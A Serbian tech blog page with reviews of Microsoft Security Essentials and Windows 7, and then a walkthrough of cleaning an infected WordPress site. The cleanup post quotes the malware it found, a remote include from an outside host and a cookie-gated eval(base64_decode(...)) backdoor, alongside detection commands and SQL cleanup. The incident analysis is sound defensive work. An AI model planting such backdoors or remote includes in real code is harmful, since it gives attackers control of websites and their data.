Microsoft Security Essentials – besplatan Windows antivirus

Microsoft Security Essentials - besplatan Windows antivirusWindows je i dalje najzastupljeniji desktop operativni sistem današnjice – po nekim statistikama, preko 92% računara ima neku od verzija Windows-a instalirano.

Dodajte na ovu zastupljenost neke (pogrešne) tehnološke odluke Microsoft-a (više o tome možete pročitati u tekstu “Sigurni prozori“) i sasvim je jasno zašto je ovo platforma najviše napadana od hakera i pisca virusa – prosto, što je veće tržište, veće su šanse da se dođe do koristi (kreditne kartice, lični podaci itd).

Ovo je otvorilo vrata velikom tržištu anti-virusnih programa: Symantec, Kaspersky, McAfee, Avast, AVG, ESET (NOD32) – da pomenem samo neke. Neke od kompanija (AVG, Avast) su pored plaćenih (komercijalnih) verzija programa nudile i besplatne verzije sa manje mogućnosti, za kućne korisnike.

Sam Microsoft nije dugo ulazio u ovo tržište; to se menja 2005, kada je izašla prva verzija Windows Defender-a: programa protiv špijunskih (spyware) i generalno štetnih programa (adware); Windows Defender je sastavni deo Vista i Windows 7 operativnih sistema, dok se za XP može besplatno skinuti. No, Windows Defender je samo jedan aspekt zaštite – i dalje nije štitio od virusa.

Novembra 2008. se to menja – Microsoft objavljuje da radi na projektu Morro, osnovnom antivirusu za Windows operativne sisteme; kroz nekoliko verzija (i promenu imena), 29. septembra 2009. izlazi Microsoft Security Essentialss – besplatan Windows antivirus program koji podržava XP, Vista i Windows 7 operativne sisteme. Jedini uslov da bi instalirali ovaj paket je da imate legalnu kopiju Windows-a.

Nakon 15 dana korišćenja (na Visti i Windows 7) mogu reći da je Security Essentials sasvim ok rešenje za kućne korisnike – nije napadan, korisnički interfejs (ekrani samog programa) je jednostavan i lako razumljiv, opterećenje računara je malo (čak manje od NOD32 programa koji je do sada bio moj izbor za antivirusnu zaštitu – ne verujem da ću obnoviti licencu). Preporučujem ga za instalaciju i korišćenje na svim vašim računarima gde do sada niste imali takvu vrstu zaštite (a to je, zar ne 😉 samo na skoro kupljenim računarima).

Linkovi:

Windows 7 RTM

Windows 7 RTM: odličan operativni sistemWindows 7 RTM (Release to Manufacturing) je stigao; doduše, ako niste MSDN pretplatnik ili na neki drugi način vezani sa Microsoftom, mogućnost da ga instalirate je za vas u oktobru; na moju sreću, zbog posla koji radim, ovo kuckam iz Windows 7 Professional 🙂

Iako ga mnogi proglašavaju ispravkom za Vistu ili ono što je Vista trebala da bude, to prosto nije tačno – Windows 7 je novi operativni sistem, sa dovoljno izmena spolja i (pogotovo) iznutra da u takvo nešto ne treba imati sumnje.

Kako sam već dosta toga napisao o Windows 7 funkcijama u beta 1 izdanju, ovde ću probati samo da dodam stvari koje su ili specifične za finalno (RTM) izdanje ili koje sam propustio u prvom pisanju.

Instalacija

Windows 7 je moguće instalirati preko Viste (upgrade opcija) ili direktno, na čistu mašinu ili posebni disk. Direktan upgrade sa Windows 7 Beta/RC ili sa XP na W7 nije moguć; doduše, to nije preveliki hendikep – ionako je bolje da uradite čistu instalaciju i time dobijete maksimalno stabilan sistem, bez nasleđenih (loših) drajvera i/ili programa.

Windows Easy Transfer

Windows 7: Easy Transfer(klikni za veću sliku)
Naravno, “čist install” ne znači da treba da se odreknete podešavanja vaših aplikacija koje ste mukotrpno postavljali kako vam najviše leži. Bez obzira da li je vaš prethodni sistem Vista ili XP, preporučujem korišćenje Windows Easy Transfer alata (nalazi se na instalacionom disku, direktorijum SupportMigwiz, datoteka migsetup.exe) – zapakovaće sve vaše datoteke, podešavanja registrija i sve ostalo što je potrebno da se na novom operativnom sistemu osećate kao kod kuće. Tu datoteku možete snimiti na USB disk ili CD/DVD i kasnije upotrebiti u novoinstaliranom sistemu. Sem podešavanja, Easy Transfer će vam dati i spisak programa (i osvežavati isti) koje trebate da instalirate da bi sve radilo kako očekujete (vidi sliku).

Sama instalacija je jako brza; uz minimum pitanja, i samo jednim restartom (zavisi od vaše mašine i/ili izabrane konfiguracije) za 20-ak minuta imate radeći Windows 7 sistem. Većina drajvera je automatski instalirana (ili sa DVD-a ili preko Windows Update sajta) – jedini uređaj na mojoj konfiguraciji koji nije instaliran je modem (što me ne brine previše).

Kompatibilnost

Ako je aplikacija radila na Visti, skoro sigurno će raditi i na Windows 7. Instalirao sam standardan paket za poslovnu mašinu:

i za sada nije bilo nikakvih problema u svakodnevnom radu.

Mnoge druge stvari sa referentne liste programa nisu više potrebne, jer su ugrađene u sam W7 (osvežiću listu čim pre).

Mali problem je što je Windows 7 prvi operativni sistem koji nema ugrađen mail klijent (možete uzeti besplatan Windows Live Mail iz Essentials paketa) pa u startu ne postoji ni jedan program koji podržava mailto: protokol; tako da može desiti da aplikacije koje se oslanjaju na Outlook Express za slanje maila neće raditi.

Svakodnevni rad

Libraries

Ono što mi je oduvek nedostajalo i ograničavalo u radu (doduše, ja sam organizational freak) je to što su “specijalne” lokacije (Documents, Pictures, Music, Videos itd) zakucane na jednu i samo jednu lokaciju na disku. Kako svi danas radimo sa mrežnim okruženjima, spoljnim hard diskovima, USB Flash diskovima, teško da ćete uspeti da realnost uz gornja ograničenja ispratite efikasno.

Tu Windows 7 uvodi pojam biblioteka (Libraries) – praktično skupa vaših foldera određenog tipa:

Windows 7: Libraries

Iza svake od ovih ikona se nalazi skup foldera, koji ne moraju da budu na vašem računaru. Vrlo korisna opcija.

Taskbar

Windows 7: Taskbar
(klikni za veću sliku)

Ako bi trebalo da izdvojim jednu stvar koja karakteriše Windows 7, to je upravo rad sa taskbarom; brži je, intuitivniji, sa mnogo više mogućnosti; integracija QuickLaunch-a je izvedena još bolje od Viste.

Klik na ikonu na taskbaru otvara aplikaciju; ako je već otvorena, dovodi prvi prozor iz grupe u fokus. Shift + klik (ili klik srednjim dugmetom miša) na ikonu uvek lansira novu instancu aplikacije; posebna poslastica je Shift + Ctrl + klik – otvara aplikaciju pod administrativnim pravima. Na kraju, Shift + Right klik daje opcije za rad sa svim prozorima grupe – Restore / Minimize / Maximize.

Naravno, stare prečice (Win + 1 do Win + 0 : isto što i klik na n-tu ikonu na taskbaru) iz Viste i dalje važe.

Upravljanje prozorima

Dosta izmena je urađeno na radu sa prozorima i pokušaju da vam na svaki način olakšaju snalaženje među brdom otvorenih (pogotovo, ako imate više monitora).

Recimo, Aero Peek: ako postavite miša na umanjeni prikaz prozora u Taskbaru, svi ostali prozori na radnoj površini će “nestati”, omogućavajući vam da imate jasan pregled bez izbora samog prozora:

Windows 7: Aero Peek

Klik na umanjen prikaz će dovesti prozor u fokus i omogućiti da nastavite prekinuti rad. Takođe, postoji gomila novih tastaturnih skraćenica za rad sa prozorima:

Win + Home – Minimizuj sve prozore osim onoga u kome sada radite

Win + kurzor gore – Maksimizuj aktivni prozor
Win + kurzor dole – Minimizuj aktivni prozor

Win + kurzor levo (desno) – “Prilepi” aktivni prozor za levu (desnu) ivicu monitora

Win + space – Napravi sve prozore providnim (pogledaj desktop)

Win + Shift + kurzor levo (desno) – Prebaci prozor na levi (desni) monitor

Windows 7: Show DesktopPrikaz desktopa (Show Desktop) je sada ugrađen u sam Taksbar – ako pređete mišem preko pravougaonika na kraju Taskbara svi prozori će postati providni; klik na taj pravougaonik će ih sve minimizovati. Ikonica sa crvenim krstićem je novi Action Center (Control Panel -> System and Security -> Action Center ili dupli klik na ikonu), koji vas obaveštava o svim pronađenim problemima i nudi i rešenja (na konkretnom primeru: ovde nisam instalirao antivirusni program).

Multimedija

Kao što sam napisao u prethodnom tekstu, Windows Media Player je drastično unapređen: čistiji i jednostavniji, upravljanje vašom bibliotekom zvuka, slike i videa je sasvim dobro odrađeno. U sam Windows 7 je sada ugrađena podrška za mnoge codec-e (i H.264/MPEG-4 AVC), čak i za Blu-Ray diskove (kod nas su retkost, ali to neće još dugo biti tako).

Ono što je interesantna novost je da sada možete puštati muziku sa vašeg kućnog računara na drugi računar na koji ste ulogovani preko interneta. Za to vam je potrebno:

– Da imate Windows Live ID (ako koristite MSN/Live Messenger, već ga imate; ako ne, otvara se besplatno, uz važeću mail adresu) i da isti Windows Live ID autorizujete za pristup na oba računara (server i klijent).

– da eventualno podesite vaše rutere (port forwarding)

– uključite Windows Player i povučete muziku sa vašeg računara 🙂

Windows 7 Media Player: streaming sa kućnog računara

Ako je kojim slučajem jedan od računara u domenu (što praktično važi za većinu poslovnih računara) onda taj računar ne može biti izvor muzike, ali svakako može slušati muziku sa recimo kućnog računara.

Ispod haube

Iako je na vizuelnom delu dosta urađeno, još je bitnije (za mene) šta je sve promenjeno ispod haube – puno. Pobrojaću samo funkcije koje sam ispratio preko raznih blogova / sajtova:

1. Windows Kernel Dispatcher Lock – uklonjene su barijere za efikasan rad na računarima sa više procesorskih jezgara (uklonjen je Windows Kernel Dispatcher Lock i time ostvarena mogućnost za rad na mašinama do 256 jezgara); ovo sređivanje je otkrilo problem sa efikasnim upravljanjem memorije u sistemima sa toliko jezgara, pa je urađen i

2. Redizajn Windows Memory Manager dela.

3. Dodata je nova mrežna opcija, Direct Access – nešto kao lite VPN – način da pristupate vašem poslovnom okruženju sa W7 računara gde god da ste (zahteva da server u mreži koji izvršava Direct Acces bude Windows Server 2008 R2)

4. Mnogo bolja podrška za Solid State diskove – posebno važno za laptop računare.

Naravno, sve ove promene (kako spolja tako i iznutra) prate i promene u API pozivima, pa ćemo mi programeri imati dosta posla u dodavanju lepih novih funkcionalnosti (prvenstveno JumpList za Taskbar) u naše buduće (a bogami i postojeće) aplikacije.

Performanse

Pošto računar koristim u dnevnom radu i nemam naviku puštanja razno-raznih benchmark testova, mogu da dam samo svoj osećaj – brže od Viste. Koliko brže? Ne preterano; jer ovom efektu treba pridodati i to da je ovo novoinstalirani sistem, gde nisu svi programi instalirani kao na Visti. Sem samog “brže” (u smislu da neka operacija kraće traje) sam operativni sistem je sa mnogo boljim odzivom – klik ili taster proizvode trenutni efekat, tako da je pravo zadovoljstvo raditi.

U poređenju sa Windows XP … Prvo, nemam živu instancu XP-a već tri godine (ni kući ni na poslu) a drugo, verujem da je XP na istom harveru brži. Treće, to je i očekivano – verujem i da je Windows 98 SE na istom hardveru brži od XP-a 😛 Prosto, ko želi brzinu XP-a treba na istom i da ostane 🙂

Ukratko, na novijem hardveru Windows 7 će vam dati udobnije iskustvo od Viste.

Windows XP Mode

Windows 7: XP modeVirtuelizacija, ili mogućnost da u jednom trenutku radite sa više operativnih sistema ili instanci istog operativnog sistema je nezamenljiva kada razvijate aplikacije – lako testiranje i ispravljanje problema na različitim okruženjima bez da napustite vaš operativni sistem je način da uštedite gomilu vremena.

Već sam pominjao Virtual PC, no, Windows 7 je ovoga puta otišao i korak dalje: uveli su Windows XP Mode – način da zadržite sve vaše aplikacije koje rade pod XP-om a nisu kompatibilne sa novim Windows 7 operativnim sistemom.

Za ovo vam je potrebno:

  • Windows 7 Professional ili jači
  • Mašina koja ima hardversku podršku za virtuelizaciju (AMD-V™ ili Intel® VT)
  • Procesor od barem 1Ghz i barem 2GB RAM (32 bita) ili 3GB RAM-a (64 bita) – iako ovo shvatite kao minimum 🙂
  • Malo dodatnog prostora na disku (15 Gb)

Kada ste ovo obezbedili, ostaje da skinete Virtual PC Release Candidate kao i Windows XP Release Candidate (na istoj stranici su) i da ih instalirate. Ovim dobijate kopiju Windows XP Professiona SP3, potpuno licenciranu.

Po čemu se razlikuje Windows XP Mode od “uobičajenog” korišćenja Windows XP preko Virtual PC-a? Prvenstveno u vrlo čvrstoj integraciji sistema domaćina (Windows 7) i gosta (Windows XP): deljenje Clipboard prostora, drastično jednostavnije deljenje direktorijuma i fajlova, i najvažnije, mnogo bolji radi sa periferijom: USB uređaji se mogu ravnopravno koristiti između oba operativna sistema, a čak je moguće i štampati iz Windows XP mašine na štampače definisane u W7 okruženju. Praktično se radi o još jednom članu Microsoft Enterprise Desktop Virtualization (MED-V) familije – dva operativna sistema pod jednim desktopom: instalacija programa u XP Mode postavlja prečicu i na W7 desktop i vi možete startovati taj program direktno iz W7 okruženja.

Iako su i Virtual PC i Windows XP Mode u RC (Release Candidate) izdanju, stabilnost je dobra i nisam imao problema ni sa jednom aplikacijom koju sam probao u XP Modu (doduše, to nije veliki broj).

Za kraj

Windows 7 je pre svega izuzetan operativan sistem – ovo mogu da kažem iz 15+ godina iskustva sa Windows operativnim sistemima. W7 je vrlo stabilan (bez ijednog BSOD od kada se igram sa W7, a to je od početka godine – Beta1 i RC) i ispeglan, sa mnoštvo malih i velikih unapređenja. Ako prelazite sa XP-a, to će za vas biti sasvim novo (i vrlo lepo) iskustvo. Ako prelazite sa Viste (kao ja), dobićete smireniji, brži i efikasniji sistem, sa svim sitnicama na koje ste se navikli u Visti.

Lično, jedva čekam oktobar i instalacioni disk za kućevnu upotrebu 🙂

Ako planirate da kupujete novi računar, toplo savetujem da sačekate jesen i kupite ga sa Windows 7 Home Premium (za kuću) ili Professional izdanjem (ako ga koristite za posao). Ako pak imate novu mašinu i nešto viška novca 🙂 naručite ga kod vašeg prodavca softvera – vaš računar to zaslužuje 🙂

Update 14. avgust 2009: Microsoft Srbija je otvorio konkurs za najbolju fotografiju iz Srbije, uz šansu da to postane deo finalne verzije Windows 7 (jedna od tema). Više detalja imate ovde – rok je 24. avgust.

Čišćenje zaraženog WordPressa

Čišćenje zaraženog WordPressaIgrom slučaja, održavam veliki broj WordPress instalacija. Tu spada standardni upgrade instalacija (koji je sada dosta olakšan automatskim osvežavanjem, od verzije 2.7), backup baze i fajlova, i sličnih sitnica 🙂

Pri tom sam, kao i svi IT geekovi (freakovi) itekako ponosan na svoj rad – sve fino i ispeglano, sve radi kao sat. Možete onda zamisliti mog užasa kada sam u Google Reader-u video ovakvu sliku:

Hackovan WordPress: prikaz u RSS čitaču

Pri tom je WordPress u pitanju potpuno zakrpljen, na verziju 2.8.2

(sitno upozorenje: uputstvo koje sledi podrazumeva da zaista znate šta radite 🙂 – nije za hobi vlasnike WordPress-a i potreban je full backup svih fajlova i baze pre ikakvog igranja)

Ovo je zahtevalo solidnu akciju – krenuo sam u analizu celokupnog WordPress-a, od baze do fajlova, na svim dostupnim instalacijama.

Analiza

Promena u fajlovima – sondiranje

Prvi i najjednostavniji korak je videti da li su, i koji WordPress fajlovi promenjeni. Rečeno – učinjeno: skočio sam do WordPress release arhive i skinuo odgovarajuću verziju. Zatim sam skinuo i tekuće fajlove i uz pomoć WinMerge programa napravio poređenje.

Imao sam šta i da vidim:

index.php – umesto očekivanog:

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

dobio sam:

/** Loads the WordPress Environment and Template */
if (isset($_GET['license'])) {
    @include('http://wordpress.net.in/license.txt');
} else {
    require('./wp-blog-header.php');
}

Praktično, sajt http://wordpress.net.in/license.txt “učestvuje” u vašem blogu, a da vas za to nije pitao 😉

Zatim xmlrpc.php – umesto očekivanog:

if ( isset($HTTP_RAW_POST_DATA) )
    $HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA);

upisano je:

if ( isset($HTTP_RAW_POST_DATA) )
    $HTTP_RAW_POST_DATA = mysql_escape_string(trim($HTTP_RAW_POST_DATA));

(mada nisam uspeo da provalim kakva je funkcionalnost dodavanja mysql_escape_string funkcije).

Promena u fajlovima – detaljna analiza

Kako mi je ovo samo pokazalo da promena zaista ima, krenuo sam u temeljniju akciju: napravio sam lokalnu “sliku” sajta, dopunjujući instalaciju WordPress-a sa svim svežim pluginovima i uporedio sa situacijom sa sajta. Rezultat je bio neverovatan; ovo su samo od nekih fajlova koji su volšebno nastali na sajtu, a da ne pripadaju originalno instalaciji:

wp-content/plugins/events-calendar/ec_management.bak
wp-content/plugins/exec-php/css/admin.old
wp-content/plugins/exec-php/includes/option.old
wp-content/plugins/exec-php/images/progress.old
wp-content/plugins/wp-super-cache/wp-cache-base.old
wp-content/plugins/wp-cache/README.old
wp-content/uploads/2008/01/svinja_old.png
wp-content/themes/classic/header_old.gif

Algoritam imenovanja ovih fajlova je jednostavan – uz neki postojeći fajl se kreira novi fajl, koji dobija nastavak .old ili .bak ili to isto postaje deo imena. Bez obzira na nastavak, unutra je maliciozni php kod koji radi veoma ružne stvari.

Pored gornjih, postojala je gomila novih fajlova među slikama, sa nastavcima kao što su .pngg, .jpgg ili .giff, koji su takođe imali zločesti php kod.

Ako imate ssh pristup serveru, neke od komandi koje mogu pomoći u lociranju fajlova su:

find . -name *_new.php
find . -name *_old.php
find . -name *.old
find . -name *.bak
find . -name *.pngg
find . -name *.jpgg
find . -name *.giff 

grep -r -l -i 'f541b3abd05e7962fcab37737f40fad8' *
grep -r -l -i 'if(md5' *

Sem novih fajlova, i gomila postojećih fajlova je promenjena (obično među temama), dodavanjem nekoliko linija koda, na primer:

if(md5($_COOKIE['e4485c074ae5eeec'])=="1350e06b21ccb35f1389d7587fbe42cc") {
    eval(base64_decode($_POST['file'])); 
    exit; 
}

Prva (pogrešna) misao je da su fajlovi “nekako” dospeli na blog, i da je dovoljno da ih izbrišem i sve će biti ok. Tako sam krenuo u:

Čišćenje

Korak 1 – fajlovi

Umesto da brišem i proveravam fajl po fajl, lokalno sam:

  • Raspakovao najnoviju verziju WordPress-a
  • na to dodao sve pluginove koji se koriste na sajtu, skinute ponovo sa originalnih adresa
  • sve teme ponovo skinuo i stavio ih u wp-content/themes
  • Sa sajta: wp-config.php iz root foldera
  • Sa sajta: izmenjene fajlove iz tema, pri tom poredeći svaki izmenjeni fajl sa originalnim, koristeći WinMerge
  • Sa sajta: wp-content/uploads folder, propisno očišćen od čudnih, gore pomenutih fajlova
  • Po uploadu čiste verzije sajta pobrinuo se da svi php fajlovi imaju 644 prava pristupa

No već sledeći dan je pokazao da ova akcija nije pomogla – ponovo su spam linkovi bili u RSS feedu, i ponovo su čudni fajlovi našli put do WordPress instalacije.

Sada mi nije preostalo ništa no da razumem ceo mehanizam kako su hackeri uopšte provalili u WordPress i kako “rupu” održavaju otvorenom.

Kako su svi fajlovi bili potpuno čisti, a hack je opet proradio, logično mesto napada je naravno, MySQL baza gde WordPress drži sve svoje podatke i podešavanja.

Korak 2 – baza podataka

Kada proveravam podatke, koristim uvek “direktni” pristup – nikako kroz sam WordPress admin panel. Prvo sam pregledao wp_users tabelu i imao sam šta i da vidim:

Korak 2.1 – strani administratorski nalozi

Hakovana WordPress baza: users tabela
(klikni za veću sliku)

  • Dodat je WordPress user, sa nultim vremenom kreiranja
  • Dodat je jedan ili više usera, gde je username nastalo ili od mail adrese admina ili na admin nalepljeno još neko slovo. Karakteristično je vreme kreiranja – identično je vremenu kreiranja prvog admin naloga (praktično kopiranje sloga)

Naravno, svi novokreirani nalozi imaju administrativna prava (dalje ispitivanje je pokazalo da je WordPress imao gomile propusta u verzijama 2.2 – 2.7 koji su omogućavali ovakvo direktno kreiranje naloga).

Rešenje: obrisati sve te naloge.

Ovakvi nalozi daju napadajućem skriptu mogućnost da radi šta god bilo: da kreira fajlove, da menja podatke u bazi; pitanje je šta je stvarno od toga i urađeno.

Korak 2.2 – wp_options / active_plugins

Pokušao sam da u samoj bazi nađem referencu na neki od “čudnih” fajlova, ranije pronađenih; i našao sam ih: nalazili su se fino ušuškani u tabeli wp_options, pod sekcijom ‘active_plugins‘; ovo praktično znači da im je obezbeđeno automatsko učitavanje svaki put prilikom podizanja WordPressa.

Proveru možete izvršiti ili SQL upitom:

SELECT *
FROM `wp_options`
WHERE option_name = "active_plugins"

ili smeštanjem i izvšavanjem malog php programčeta koji će to uraditi za vas (daleko pregledniji a i ne zavisi od wordpress table prefix-a):

<?php
require( './wp-load.php' ); 
if ( get_option('active_plugins') ) 
{
    $current_plugins = get_option('active_plugins');
    if ( is_array($current_plugins) ) 
    {
     foreach ($current_plugins as $plugin) 
     {
       if ('' != $plugin ) 
       {
         echo $plugin . '<br />';
       }
     }
    }
}
if ( get_option('internal_links_cache') ) 
{
    $link = get_option('internal_links_cache');
    if ('' != $link ) 
    {
      echo '<hr>DELETE internal_links_cache option!<br />';
    }
}?>

Rešenje: ako ste locirali nedozvoljene ili neobične pozive vezane uz neke pluginove, najlakše ćete se osloboditi tih delova ako kroz WordPress admin panel deaktivirate taj plugin pa ga ponovo aktivirate.

A šta ovi fajlovi zaista rade? Ako malo analizirate (poprilično šifrovan) kod ovih fajlova, jedan od elemenata koje ćete videti je i:

SELECT option_value FROM $wpdb->options 
WHERE option_name='rss_f541b3abd05e7962fcab37737f40fad8'

i to se nalazilo u većini hack fajlova.

Vrednost ove opcije (isto iz tabele wp_options, ovoga puta za option_name = ‘rss_f541b3abd05e7962fcab37737f40fad8‘) je ogromno parče base64 šifrovanog php koda (pre toga uradite strrev, ako želite da ga pravilno čitate) gde se nalazi pravi engine cele hack rutine – od “ispaljivanja” spam linkova pa sve do otvaranja i ispisivanja CELE BAZE korisniku koji zna da priđe sajtu kako treba – veoma destruktivan kod.

Ako pobliže zagledate gornji php kod za izlistavanje, videćete da pored izlistavanja pluginova, ovaj kod proverava i postojanje opcije ‘internal_links_cache’ – naime, neki od hack fajlova čitaju ovu opciju, rade base64_decode i sadržaj (a to su obično gomile i gomile spam linkova) ispaljuju u vaš RSS feed.

Rešenje: obrisati slogove iz wp_options tabele sa
option_name = ‘rss_f541b3abd05e7962fcab37737f40fad8’ i option_name = ‘internal_links_cache’:

DELETE FROM wp_options WHERE option_name = 'internal_links_cache' OR 
option_name = 'rss_f541b3abd05e7962fcab37737f40fad8';

Na kraju

Samo da sumiram; ako vam se u vašoj instalaciji WordPress-a učini bilo šta sumnjivo (javi se vaš antivirus program, korisnici primete čudan sadržaj u RSS feedu), onda:

  • Uradite full backup i baze i fajlova
  • Nađite nekog ko sme da se bakće sa samim sitnim crevcima WordPress-a
  • Proverite prvo fajlove
  • Proverite administratorske naloge
  • Proverite opcije samog WordPressa koje omogućavaju da se useli neželjeni kod

Tek ovakve stvari pokazuju koliko je važno da održavate vaš WordPress “svežim” i da primenjujete zakrpe čim se pojave – inače, možete postati i ostati žrtva spamera a da toga niste ni svesni.